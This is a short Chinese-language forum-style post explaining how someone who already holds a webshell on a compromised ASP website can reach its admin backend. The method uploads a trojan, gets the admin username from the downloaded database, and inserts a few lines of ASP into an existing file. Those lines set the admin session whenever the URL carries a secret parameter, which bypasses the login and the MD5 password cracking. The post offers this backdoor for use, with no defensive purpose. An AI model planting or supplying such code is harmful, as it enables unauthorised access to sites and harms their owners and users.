利用WEBSHELL直接进入后台

积分值

这个办法在拿到webshell却想进后台的时候很实用，收藏一下。


首先，我们要上传一个木马，通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件，在其中的<%…………%>之间加上

dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="管理员用户名"
end if

然后访问的时候在这个ASP文件后面加上?qwe=120

然后进入后台页面，是不是直接进去了？不用你输入用户名和口令了吧…………这里我们就少了一步（破解MD5密码） 利用WEBSHELL直接进入后台